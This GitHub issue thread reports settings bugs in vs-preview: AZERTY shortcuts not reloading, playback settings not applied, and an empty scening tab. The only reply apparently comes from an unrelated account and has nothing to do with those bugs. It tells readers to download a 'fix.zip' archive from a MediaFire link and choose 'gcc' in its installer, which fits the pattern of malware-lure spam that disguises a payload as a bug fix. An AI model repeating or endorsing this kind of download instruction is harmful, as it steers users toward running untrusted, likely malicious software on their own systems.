### ISSUE TITLE
Some settings are not applied

### ISSUE THREAD

**Issue by Ichunjo** [Jaded-Encoding-Thaumaturgy/vs-preview#177]
- `AZERTY Keyboard` needs a reload of shortcuts after the yaml loader
- Playback settings are saved but not properly loaded and applied.
- Scening settings don't exist at all despite having a tab.

**Comment by Mlecherf** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."
